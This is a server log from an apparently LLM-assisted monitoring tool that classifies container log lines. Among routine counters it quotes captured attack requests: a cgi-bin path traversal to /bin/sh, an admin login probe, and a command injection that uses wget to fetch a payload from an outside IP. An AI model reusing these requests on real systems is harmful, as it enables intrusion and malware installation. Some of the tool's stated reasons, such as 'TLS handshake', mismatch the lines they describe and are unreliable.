06:33:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:33:02.002454 [observer] Patterns: hash=2380 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:33:31.934813 [observer] Pipeline: processed=2430 pattern_hits=2384 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:33:31.934846 [observer] Patterns: hash=2384 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:01.950678 [observer] Pipeline: processed=2432 pattern_hits=2386 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:01.950712 [observer] Patterns: hash=2386 prefix=0 regex=0 
contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:31.933737 [observer] Pipeline: processed=2437 pattern_hits=2391 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:31.933762 [observer] Patterns: hash=2391 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:34:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:51.540192 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 20 06:34:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:51.540988 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 06:34:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:58.895774 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 06:34:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:58.895809 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 06:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:35:01.942346 [observer] Pipeline: processed=2443 pattern_hits=2394 llm_calls=49 llm_errors=0 learned=0 Mar 20 06:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:35:01.942594 [observer] Patterns: hash=2394 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49 Mar 20 06:35:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:35:11.216775 [analyzer] LLM verdict for docker:captain-netdata-container: classification=suspicious confidence=0.55 action=alert pattern_type= Mar 20 06:35:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:35:11.216806 [SUSPICIOUS] Source=docker:captain-netdata-container Reason=A WARNING about a missing configuration file can indicate misconfiguration or disabled features; not 
an attack but warrants monitoring. Line=2026-03-20T06:34:45.692238002Z 2026-03-20 06:34:45: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'. Mar 20 06:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:35:31.948500 [observer] Pipeline: processed=2446 pattern_hits=2397 llm_calls=49 llm_errors=0 learned=0 Mar 20 06:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:35:31.948525 [observer] Patterns: hash=2397 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49 Mar 20 06:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:36:01.960441 [observer] Pipeline: processed=2450 pattern_hits=2401 llm_calls=49 llm_errors=0 learned=0 Mar 20 06:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:36:01.960578 [observer] Patterns: hash=2401 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49 Mar 20 06:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:36:31.944752 [observer] Pipeline: processed=2452 pattern_hits=2403 llm_calls=49 llm_errors=0 learned=0 Mar 20 06:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:36:31.944783 [observer] Patterns: hash=2403 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49 Mar 20 06:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:37:01.966837 [observer] Pipeline: processed=2456 pattern_hits=2407 llm_calls=49 llm_errors=0 learned=0 Mar 20 06:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:37:01.966871 [observer] Patterns: hash=2407 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49 Mar 20 06:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:37:31.943545 [observer] Pipeline: processed=2458 pattern_hits=2409 llm_calls=49 llm_errors=0 learned=0 Mar 20 06:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:37:31.943571 [observer] Patterns: hash=2409 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49 Mar 20 06:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:38:01.942213 [observer] Pipeline: 
processed=2461 pattern_hits=2412 llm_calls=49 llm_errors=0 learned=0 Mar 20 06:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:38:01.942267 [observer] Patterns: hash=2412 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49 Mar 20 06:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:38:31.935009 [observer] Pipeline: processed=2464 pattern_hits=2415 llm_calls=49 llm_errors=0 learned=0 Mar 20 06:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:38:31.935044 [observer] Patterns: hash=2415 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49 Mar 20 06:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:39:01.950027 [observer] Pipeline: processed=2466 pattern_hits=2417 llm_calls=49 llm_errors=0 learned=0 Mar 20 06:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:39:01.950057 [observer] Patterns: hash=2417 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49 Mar 20 06:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:39:31.934025 [observer] Pipeline: processed=2472 pattern_hits=2423 llm_calls=49 llm_errors=0 learned=0 Mar 20 06:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:39:31.934046 [observer] Patterns: hash=2423 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49 Mar 20 06:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:01.952073 [observer] Pipeline: processed=2474 pattern_hits=2425 llm_calls=49 llm_errors=0 learned=0 Mar 20 06:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:01.952104 [observer] Patterns: hash=2425 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49 Mar 20 06:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:31.933836 [observer] Pipeline: processed=2479 pattern_hits=2428 llm_calls=51 llm_errors=0 learned=0 Mar 20 06:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:31.933861 [observer] Patterns: hash=2428 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=51 Mar 20 06:40:33 ip-172-26-12-110 
observer[1565011]: 2026/03/20 06:40:33.108850 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.60 action=alert pattern_type= Mar 20 06:40:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:33.108885 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T06:40:28.999872079Z 85.11.167.19 - - [20/Mar/2026:06:40:28 +0000] "captain.admin.kovicloud.com" "POST / HTTP/1.1" 404 9 "https://captain.admin.kovicloud.com" "Mozilla/5.0 (Windows NT 10.0; ... Mar 20 06:40:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:33.110483 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T06:40:29.487295201Z 85.11.167.19 - - [20/Mar/2026:06:40:29 +0000] "captain.admin.kovicloud.com" "POST / HTTP/1.1" 404 9 "https://captain.admin.kovicloud.com" "Mozilla/5.0 (Windows NT 10.0; ... 
Mar 20 06:40:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:33.406564 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 06:40:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:33.406600 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 06:40:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:40.132043 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 06:40:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:40.132077 [analyzer] Source hint mismatch: LLM says "docker-nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 06:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:41:01.955416 [observer] Pipeline: processed=2484 pattern_hits=2432 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:41:01.955446 [observer] Patterns: hash=2432 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:41:31.934127 [observer] Pipeline: processed=2487 pattern_hits=2435 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:41:31.934152 [observer] Patterns: hash=2435 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:42:01.958361 [observer] Pipeline: processed=2490 pattern_hits=2438 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:42:01.958388 [observer] Patterns: hash=2438 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:42:31.950332 [observer] 
Pipeline: processed=2492 pattern_hits=2440 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:42:31.950353 [observer] Patterns: hash=2440 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:43:01.980715 [observer] Pipeline: processed=2496 pattern_hits=2444 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:43:01.980741 [observer] Patterns: hash=2444 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:43:31.944104 [observer] Pipeline: processed=2498 pattern_hits=2446 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:43:31.944125 [observer] Patterns: hash=2446 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:44:01.943989 [observer] Pipeline: processed=2502 pattern_hits=2450 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:44:01.944026 [observer] Patterns: hash=2450 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:44:31.942149 [observer] Pipeline: processed=2506 pattern_hits=2454 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:44:31.942206 [observer] Patterns: hash=2454 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:45:01.957686 [observer] Pipeline: processed=2509 pattern_hits=2457 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:45:01.958130 [observer] Patterns: hash=2457 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:45:31 
ip-172-26-12-110 observer[1565011]: 2026/03/20 06:45:31.933909 [observer] Pipeline: processed=2512 pattern_hits=2460 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:45:31.933935 [observer] Patterns: hash=2460 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:46:01.948970 [observer] Pipeline: processed=2514 pattern_hits=2462 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:46:01.948999 [observer] Patterns: hash=2462 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:46:31.934962 [observer] Pipeline: processed=2518 pattern_hits=2466 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:46:31.934992 [observer] Patterns: hash=2466 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:47:01.949718 [observer] Pipeline: processed=2520 pattern_hits=2468 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:47:01.949744 [observer] Patterns: hash=2468 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:47:31.933778 [observer] Pipeline: processed=2524 pattern_hits=2472 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:47:31.933800 [observer] Patterns: hash=2472 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:48:01.984106 [observer] Pipeline: processed=2526 pattern_hits=2474 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:48:01.984136 [observer] Patterns: hash=2474 prefix=0 regex=0 
contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:48:31.934682 [observer] Pipeline: processed=2529 pattern_hits=2477 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:48:31.934705 [observer] Patterns: hash=2477 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:49:01.940430 [observer] Pipeline: processed=2532 pattern_hits=2480 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:49:01.940482 [observer] Patterns: hash=2480 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:49:31.942925 [observer] Pipeline: processed=2536 pattern_hits=2484 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:49:31.942955 [observer] Patterns: hash=2484 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:50:01.995085 [observer] Pipeline: processed=2540 pattern_hits=2488 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:50:01.995427 [observer] Patterns: hash=2488 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:50:31.941895 [observer] Pipeline: processed=2542 pattern_hits=2490 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:50:31.941920 [observer] Patterns: hash=2490 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:51:01.942361 [observer] Pipeline: processed=2546 pattern_hits=2494 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 
06:51:01.942389 [observer] Patterns: hash=2494 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:51:31.934012 [observer] Pipeline: processed=2548 pattern_hits=2496 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:51:31.934036 [observer] Patterns: hash=2496 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:52:01.953815 [observer] Pipeline: processed=2550 pattern_hits=2498 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:52:01.953842 [observer] Patterns: hash=2498 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:52:31.934797 [observer] Pipeline: processed=2554 pattern_hits=2502 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:52:31.934830 [observer] Patterns: hash=2502 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52 Mar 20 06:52:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:52:49.611996 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. 
Line=2026-03-20T06:52:49.611736189Z 125.17.108.32 - - [20/Mar/2026:06:52:49 +0000] "_" "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-" Mar 20 06:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:53:01.943191 [observer] Pipeline: processed=2557 pattern_hits=2505 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:53:01.943230 [observer] Patterns: hash=2505 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=52 Mar 20 06:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:53:31.937274 [observer] Pipeline: processed=2561 pattern_hits=2509 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:53:31.937305 [observer] Patterns: hash=2509 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=52 Mar 20 06:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:54:01.946941 [observer] Pipeline: processed=2563 pattern_hits=2511 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:54:01.946966 [observer] Patterns: hash=2511 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=52 Mar 20 06:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:54:31.935077 [observer] Pipeline: processed=2569 pattern_hits=2517 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:54:31.935108 [observer] Patterns: hash=2517 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=52 Mar 20 06:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:01.959641 [observer] Pipeline: processed=2571 pattern_hits=2519 llm_calls=52 llm_errors=0 learned=0 Mar 20 06:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:01.961669 [observer] Patterns: hash=2519 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=52 Mar 20 06:55:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:29.783065 [analyzer] 
LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 06:55:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:29.783105 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /boaform/admin/formLogin with username parameter suggests an automated attempt to probe for vulnerable admin interfaces or login forms. Not confirmed malicious, but notable. Line=2026-03-20T06:55:24.820116008Z 2026/03/20 06:55:24 [error] 422#422: *746523 open() "/usr/share/nginx/default/boaform/admin/formLogin" failed (2: No such file or directory), client: 72.255.33.117, serv... Mar 20 06:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:31.934089 [observer] Pipeline: processed=2575 pattern_hits=2521 llm_calls=54 llm_errors=0 learned=0 Mar 20 06:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:31.934114 [observer] Patterns: hash=2521 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54 Mar 20 06:55:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:33.086973 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 06:55:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:33.087012 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /boaform/admin/formLogin with username and password parameters suggests credential stuffing or probing for login forms on a web interface. 
Line=2026-03-20T06:55:24.820208510Z 72.255.33.117 - - [20/Mar/2026:06:55:24 +0000] "_" "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 2401 "-" "-" "-" Mar 20 06:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:56:01.952748 [observer] Pipeline: processed=2579 pattern_hits=2525 llm_calls=54 llm_errors=0 learned=0 Mar 20 06:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:56:01.952780 [observer] Patterns: hash=2525 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54 Mar 20 06:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:56:31.934291 [observer] Pipeline: processed=2581 pattern_hits=2527 llm_calls=54 llm_errors=0 learned=0 Mar 20 06:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:56:31.934315 [observer] Patterns: hash=2527 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54 Mar 20 06:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:57:01.937707 [observer] Pipeline: processed=2585 pattern_hits=2531 llm_calls=54 llm_errors=0 learned=0 Mar 20 06:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:57:01.937844 [observer] Patterns: hash=2531 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54 Mar 20 06:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:57:31.944742 [observer] Pipeline: processed=2587 pattern_hits=2533 llm_calls=54 llm_errors=0 learned=0 Mar 20 06:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:57:31.944769 [observer] Patterns: hash=2533 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54 Mar 20 06:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:58:01.969377 [observer] Pipeline: processed=2591 pattern_hits=2537 llm_calls=54 llm_errors=0 learned=0 Mar 20 06:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:58:01.969414 [observer] Patterns: hash=2537 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54 Mar 20 06:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:58:31.934124 [observer] Pipeline: 
processed=2593 pattern_hits=2539 llm_calls=54 llm_errors=0 learned=0 Mar 20 06:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:58:31.934147 [observer] Patterns: hash=2539 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54 Mar 20 06:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:59:01.939697 [observer] Pipeline: processed=2595 pattern_hits=2541 llm_calls=54 llm_errors=0 learned=0 Mar 20 06:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:59:01.939720 [observer] Patterns: hash=2541 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54 Mar 20 06:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:59:31.936566 [observer] Pipeline: processed=2599 pattern_hits=2545 llm_calls=54 llm_errors=0 learned=0 Mar 20 06:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:59:31.936590 [observer] Patterns: hash=2545 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54 Mar 20 07:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:00:01.962051 [observer] Pipeline: processed=2603 pattern_hits=2549 llm_calls=54 llm_errors=0 learned=0 Mar 20 07:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:00:01.962085 [observer] Patterns: hash=2549 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54 Mar 20 07:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:00:31.936388 [observer] Pipeline: processed=2607 pattern_hits=2553 llm_calls=54 llm_errors=0 learned=0 Mar 20 07:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:00:31.936416 [observer] Patterns: hash=2553 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54 Mar 20 07:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:01:01.956342 [observer] Pipeline: processed=2609 pattern_hits=2555 llm_calls=54 llm_errors=0 learned=0 Mar 20 07:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:01:01.956551 [observer] Patterns: hash=2555 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54 Mar 20 07:01:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 07:01:31.934033 [observer] Pipeline: processed=2613 pattern_hits=2559 llm_calls=54 llm_errors=0 learned=0
Mar 20 07:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:01:31.934222 [observer] Patterns: hash=2559 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 07:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:01.970390 [observer] Pipeline: processed=2616 pattern_hits=2562 llm_calls=54 llm_errors=0 learned=0
Mar 20 07:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:01.970421 [observer] Patterns: hash=2562 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 07:02:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:25.477318 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T07:02:25.477004842Z 172.206.192.187 - - [20/Mar/2026:07:02:25 +0000] "_" "GET /cgibin/mainfunction.cgi&action=login&keyPath=wget+http%3A%2F%2F161.97.148.194%2Fnullnet_bin_dir%2Fnullnet_load...
Mar 20 07:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:31.938531 [observer] Pipeline: processed=2620 pattern_hits=2566 llm_calls=54 llm_errors=0 learned=0
Mar 20 07:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:31.938561 [observer] Patterns: hash=2566 prefix=0 regex=0 contains=0 deny=6 alert=14 suppress=0 misses=54
Mar 20 07:02:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:39.005125 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 07:02:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:39.005178 [hints] Suggestion for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: field type "timestamp" seen in 12/20 lines, example: "2026-03-20T06:55:24.820208510Z" → ""
